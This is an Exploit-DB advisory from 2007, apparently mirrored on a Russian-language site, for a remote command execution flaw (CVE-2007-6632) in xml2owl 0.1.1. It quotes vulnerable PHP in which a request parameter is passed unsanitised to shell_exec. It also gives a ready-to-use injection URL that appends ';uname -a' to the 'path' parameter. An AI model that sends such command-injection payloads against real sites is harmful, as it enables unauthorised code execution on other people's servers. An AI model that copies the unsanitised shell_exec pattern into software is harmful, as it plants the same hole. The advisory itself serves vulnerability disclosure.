- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4800
- Проверка EDB
-
- Пройдено
- Автор
- MHZ91
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-6632
- Дата публикации
- 2007-12-28
Код:
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Remote Command Execution
---------------------------------------------------------------
# Author: MhZ91
# Title: xml2owl-0.1.1 - Remote Command Execution
# Download: http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2
# Bug: Remote Command Execution
# Info: Up to now, most ontologies are created manually, which is very time-expensive. The goal is it, to produce ontologies automatically via XSLT, which fit as good as possible to a given XML-file resp. XML-Schema-file
# Visit: http://www.inj3ct-it.org
---------------------------------------------------------------
In the file showCode.php there is this...
<?
$xml2html = "xsl/xmlverbatim.xsl";
$path = $_REQUEST['path']; <-
if(class_exists('XSLTProcessor')) {
$xsl = new XSLTProcessor();
$res = DOMDocument::load($path);
$xsl->importStylesheet(DOMDocument::load($xml2html));
echo $xsl->transformToXML($res);
}
else {
$exec_string = "xsltproc " . $xml2html . " " . $path; <-
echo shell_exec($exec_string); <-
}
?>
We can modify the $path variable.. and give a remote command execution by the function shell_exec..
Type http://www.site.com/showCode.php?path=;uname -a
...
---------------------------------------------------------------
# milw0rm.com [2007-12-28]- Источник
- www.exploit-db.com
